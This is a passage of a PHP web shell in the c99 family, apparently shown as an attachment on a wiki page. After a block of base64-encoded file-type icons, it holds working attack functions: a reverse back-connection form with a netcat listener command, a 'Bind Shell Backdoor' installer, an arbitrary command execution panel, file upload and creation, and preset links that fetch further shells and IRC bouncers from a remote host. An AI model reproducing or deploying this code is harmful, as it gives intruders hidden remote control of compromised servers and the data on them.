3057 "/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX".
3058 "pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA".
3059 "dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW".
3060 "9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK".
3061 "4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
3062 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
3063 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
3064 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
3065 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
3066 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
3067 "AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm".
3068 "C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg".
3069 "2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF".
3070 "CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA".
3071 "Ow==",
3072 "ext_doc"=>
3073 "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR".
3074 "WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq".
3075 "MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=",
3076 "ext_exe"=>
3077 "R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7".
3078 "WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt".
3079 "xhIAOw==",
3080 "ext_h"=>
3081 "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB".
3082 "WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo".
3083 "Wq/NknbbSgAAOw==",
3084 "ext_hpp"=>
3085 "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF".
3086 "WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR".
3087 "UqUagnbLdZa+YFcCADs=",
3088 "ext_htaccess"=>
3089 "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6".
3090 "WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ".
3091 "AAA7",
3092 "ext_html"=>
3093 "R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz".
3094 "c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P".
3095 "KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk".
3096 "Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR".
3097 "ADs=",
3098 "ext_jpg"=>
3099 "R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".
3100 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
3101 "Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
3102 "FxEAOw==",
3103 "ext_js"=>
3104 "R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH".
3105 "k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs".
3106 "a00AjYYBbc/o9HjNniUAADs=",
3107 "ext_lnk"=>
3108 "R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO".
3109 "NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi".
3110 "Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk".
3111 "AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG".
3112 "MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA".
3113 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
3114 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
3115 "AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5".
3116 "NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf".
3117 "1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ".
3118 "ADs=",
3119 "ext_log"=>
3120 "R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA".
3121 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN".
3122 "zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==",
3123 "ext_php"=>
3124 "R0lGODlhEAAQAIABAAAAAP///ywAAAAAEAAQAAACJkQeoMua1tBxqLH37HU6arxZYLdIZMmd0OqpaGeyYpqJlRG/rlwAADs=",
3125 "ext_pl"=>
3126 "R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo".
3127 "GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7",
3128 "ext_swf"=>
3129 "R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O".
3130 "nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
3131 "ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".
3132 "GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".
3133 "NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",
3134 "ext_tar"=>
3135 "R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC".
3136 "Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF".
3137 "HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD".
3138 "UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p".
3139 "uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
3140 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
3141 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
3142 "AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg".
3143 "GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd".
3144 "HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB".
3145 "u4tLAgEAOw==",
3146 "ext_txt"=>
3147 "R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
3148 "SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
3149 "UpPWG3Ig6Hq/XmRjuZwkAAA7",
3150 "ext_wri"=>
3151 "R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
3152 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
3153 "a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
3154 "ext_xml"=>
3155 "R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
3156 "gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
3157 "AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
3158 "OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
3159 "IQA7"
3160 );
3161 //Untuk optimalisasi ukuran dan kecepatan.
3162 $imgequals = array(
3163   "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
3164   "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
3165   "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
3166   "ext_html"=>array("ext_html","ext_htm"),
3167   "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
3168   "ext_lnk"=>array("ext_lnk","ext_url"),
3169   "ext_ini"=>array("ext_ini","ext_css","ext_inf"),
3170   "ext_doc"=>array("ext_doc","ext_dot"),
3171   "ext_js"=>array("ext_js","ext_vbs"),
3172   "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
3173   "ext_wri"=>array("ext_wri","ext_rtf"),
3174   "ext_swf"=>array("ext_swf","ext_fla"),
3175   "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
3176   "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
3177 );
3178 if (!$getall) {
3179   header("Content-type: image/gif");
3180   header("Cache-control: public");
3181   header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
3182   header("Cache-control: max-age=".(60*60*24*7));
3183   header("Last-Modified: ".date("r",filemtime(__FILE__)));
3184   foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
3185   if (empty($images[$img])) {$img = "small_unk";}
3186   if (in_array($img,$ext_tar)) {$img = "ext_tar";}
3187   echo base64_decode($images[$img]);
3188 }
3189 else {
3190   foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}}
3191 
3192   natsort($images);
3193   $k = array_keys($images);
3194   echo  "<center>";
3195   foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";}
3196   echo "</center>";
3197 }
3198 exit;
3199 }
3200 if ($act == "about") {
3201   echo "<center><b>Credits:</b><br>Idea, leading and coding by <b>tristram [CCTeaM]</b><br>Beta-testing and some tips by <b>visual [AnTiSh@Re tEaM]</b><br>Re-Coding, tricks, and css by <b>FaTaLisTiCz_Fx [FeeLCoMz CoMMuNiTy]</b><br><br> Thanks all who report bugs<br>Please report bugs to <a href=\"mailto:naura416@gmail.com\">FaTaLisTiCz_Fx</a></b>";
3202 }
3203 if ($act == "backc") {
3204   $ip = $_SERVER["REMOTE_ADDR"];
3205   $msg = $_POST['backcconnmsg'];
3206   $emsg = $_POST['backcconnmsge'];
3207   echo("<center><b>Back-Connection:</b></br></br><form name=form method=POST>Host:<input type=text name=backconnectip size=15 value=$ip> Port: <input type=text name=backconnectport size=15 value=5992> Use: <select size=1 name=use><option value=Perl>Perl</option><option value=C>C</option></select> <input type=submit name=submit value=Connect></form>Click 'Connect' only after you open port for it first. Once open, use NetCat, and run '<b>nc -l -n -v -p 5992</b>'<br><br></center>");
3208   echo("$msg");
3209   echo("$emsg");
3210 }
3211 if ($act == "shbd"){
3212   $msg = $_POST['backcconnmsg'];
3213   $emsg = $_POST['backcconnmsge'];
3214   echo("<center><b>Bind Shell Backdoor:</b><br><br><form name=form method=POST>
3215   Bind Port: <input type='text' name='backconnectport' value='5992'>
3216   <input type='hidden' name='use' value='shbd'>
3217   <input type='submit' value='Install Backdoor'></form>");
3218   echo("$msg");
3219   echo("$emsg");
3220   echo("</center>");
3221 }
3222 echo "</td></tr></table>\n";
3223 //COMMANDS PANEL
3224 ?>
3225 <div  class=barheader2><b>.: COMMANDS PANEL :.</b></div>
3226 <table class=mainpanel>
3227 <?php
3228 if (!$safemode) {
3229 ?>
3230 <tr><td align=right>Command:</td>
3231 <td><form method="POST">
3232     <input type=hidden name=act value="cmd">
3233     <input type=hidden name="d" value="<?php echo $dispd; ?>">
3234     <input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>">
3235     <input type=hidden name="cmd_txt" value="1"> - <input type=submit name=submit value="Execute">
3236     </form>
3237 </td></tr>
3238 <tr><td align=right>Quick Commands:</td>
3239 <td><form method="POST">
3240     <input type=hidden name=act value="cmd">
3241     <input type=hidden name="d" value="<?php echo $dispd; ?>">
3242     <input type=hidden name="cmd_txt" value="1">
3243     <select name="cmd">
3244     <?php
3245     foreach ($cmdaliases as $als) {
3246       echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";
3247     }
3248     foreach ($cmdaliases2 as $als) {
3249       echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";
3250     }
3251     ?>
3252     </select> -
3253     <input type=submit name=submit value="Execute">
3254     </form>
3255 </td></tr>
3256 <?php
3257 }
3258 ?>
3259 <tr><td align=right>Kernel Info:</td>
3260 <td><form method="post" action="http://google.com/search">
3261     <input type="hidden" name="client" value="firefox-a">
3262     <input type="hidden" name="rls" value="org.mozilla:en-US:official">
3263     <input type="hidden" name="hl" value="en">
3264     <input type="hidden" name="hs" value="b7p">
3265     <input name="q" type="text" id="q" size="80" value="<?php echo wordwrap(php_uname()); ?>"> -
3266     <input type=submit name="btnG" VALUE="Search">
3267     </form>
3268 </td></tr>
3269 <tr><td align=right>Upload:</td>
3270 <td><form method="POST" enctype="multipart/form-data">
3271     <input type=hidden name=act value="upload">
3272     <input type=hidden name="miniform" value="1">
3273     <input type="file" name="uploadfile"> - <input type=submit name=submit value="Upload"> <?php echo $wdt; ?>
3274     </form>
3275 </td></tr>
3276 <?php /* FaTaLisTiCz_Fx TriCkz */ ?>
3277 <script language="javascript">
3278 function set_arg(txt1,txt2) {
3279   document.forms.fphpfsys.arg1.value = txt1;
3280   document.forms.fphpfsys.arg2.value = txt2;
3281   }
3282 </script>
3283 <tr><td align=right>PHP Filesystem:</td>
3284 <td><form name="fphpfsys" method="POST"><input type=hidden name=act value="phpfsys"><input type=hidden name="d" value="<?php echo $dispd; ?>">
3285     <select name="phpfsysfunc">
3286     <?php
3287     foreach ($phpfsaliases as $als) {
3288       if ($als[1]==$phpfsysfunc) { echo "<option selected value=\"".$als[1]."\">".$als[0]."</option>"; }
3289       else { echo "<option value=\"".$als[1]."\">".$als[0]."</option>";  }
3290     }
3291     ?>
3292     </select>
3293     File/Dir/URL: <input type="text" name="arg1" id="a1" size="40" value="<?php echo htmlspecialchars($arg1); ?>">
3294     To/Max: <input type="text" name="arg2" size="50" value="<?php echo htmlspecialchars($arg2); ?>">
3295     <input type=submit name=submit value="Execute"><hr noshade size=1>
3296     <a href="#" onclick="set_arg('<?php echo $sh_mainurl."cyberz.txt"; ?>','cyberz.php')">[Fx29Sh]</a>
3297     <a href="#" onclick="set_arg('<?php echo $sh_mainurl."fx.tar.gz"; ?>','fx.tar.gz')">[psyBNC]</a>
3298     <a href="#" onclick="set_arg('<?php echo $sh_mainurl."fxb.tar.gz"; ?>','fxb.tar.gz')">[Eggdrop]</a>
3299     </form>
3300 </td></tr>
3301 <tr><td align=right>Search:</td>
3302 <td><form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>">
3303     <input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1"  checked> - regexp&nbsp;
3304     <input type=submit name=submit value="Search">
3305     </form>
3306     </td></tr>
3307 <tr><td align=right>Make File:</td>
3308 <td><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">
3309     <input type="text" name="mkfile" size="70" value="<?php echo $dispd; ?>"> - <input type=submit value="Create"> <?php echo $wdt; ?>
3310     </form></td></tr>
3311 <tr><td align=right>View File:</td>
3312 <td><form method="POST"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>">
3313     <input type="text" name="f" size="70" value="<?php echo $dispd; ?>"> - <input type=submit value="View">
3314     </form></td></tr>
3315 </table>
3316 <div class=barheader2 colspan=2><font color=yellow>.:[ Powered By Phutra | #kmc at irc.javairc.org | Generated: <?php echo round(getmicrotime()-starttime,4); ?> seconds ]:.</font></div>
3317 </body></html>
3318 <?php chdir($lastdir); c99shexit(); ?>

Attached Files

To refer to attachments on a page, use attachment:filename, as shown below in the list of files. Do NOT use the URL of the [get] link, since this is subject to change and can break easily.
  • [get | view] (2012-10-25 19:11:16, 165.1 KB) [[attachment:index.php]]
 All files | Selected Files: delete move to page copy to page

You are not allowed to attach a file to this page.

web biohackers.net